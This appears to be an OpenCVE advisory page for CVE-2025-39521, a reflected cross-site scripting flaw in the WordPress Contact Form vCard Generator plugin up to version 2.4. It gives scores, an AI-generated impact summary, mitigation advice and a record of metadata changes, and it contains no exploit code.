Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator contact-form-vcard-generator allows Reflected XSS.This issue affects Contact Form vCard Generator: from n/a through <= 2.4.
Published: 2025-04-17
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is an Improper Neutralization of Input During Web Page Generation flaw that allows a reflected cross‑site scripting (XSS) attack. An attacker can supply crafted input that is echoed back in the response, enabling the execution of arbitrary JavaScript in the victim’s browser. This can lead to session hijacking, theft of credentials, defacement, or the delivery of phishing content.

Affected Systems

The flaw affects the WordPress Contact Form vCard Generator plugin developed by Ashish Ajani, specifically all releases up to and including version 2.4. Any WordPress site that has this plugin installed with a vulnerable version is at risk.

Risk and Exploitability

The vulnerability has a CVSS score of 7.1 and an EPSS less than 1%, indicating moderate severity but a low likelihood of exploitation at present. It is not listed in CISA’s KEV catalog. The attack requires a user to visit a crafted URL or submit a malicious request that is reflected by the plugin, making it a typical user‑interaction needed reflected XSS scenario. Although the prevalence is currently low, the potential impact to confidentiality and authenticity warrants timely remediation.

Generated by OpenCVE AI on April 30, 2026 at 22:07 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the plugin to a version newer than 2.4 to remove the reflected XSS flaw.
  • If an upgrade is not yet available, temporarily disable or remove the Contact Form vCard Generator plugin until a fix is released.
  • Apply a Content Security Policy that blocks inline scripts to reduce the impact of any unintended reflected input.

Generated by OpenCVE AI on April 30, 2026 at 22:07 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-11737 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator allows Reflected XSS. This issue affects Contact Form vCard Generator: from n/a through 2.4.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator allows Reflected XSS. This issue affects Contact Form vCard Generator: from n/a through 2.4. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator contact-form-vcard-generator allows Reflected XSS.This issue affects Contact Form vCard Generator: from n/a through <= 2.4.
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Thu, 17 Apr 2025 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 17 Apr 2025 16:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator allows Reflected XSS. This issue affects Contact Form vCard Generator: from n/a through 2.4.
Title WordPress Contact Form vCard Generator plugin <= 2.4 - Reflected Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:12:33.956Z

Reserved: 2025-04-16T06:24:32.684Z

Link: CVE-2025-39521

cve-icon Vulnrichment

Updated: 2025-04-17T18:09:03.698Z

cve-icon NVD

Status : Deferred

Published: 2025-04-17T16:15:56.370

Modified: 2026-04-23T15:29:43.223

Link: CVE-2025-39521

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-30T22:15:16Z

Weaknesses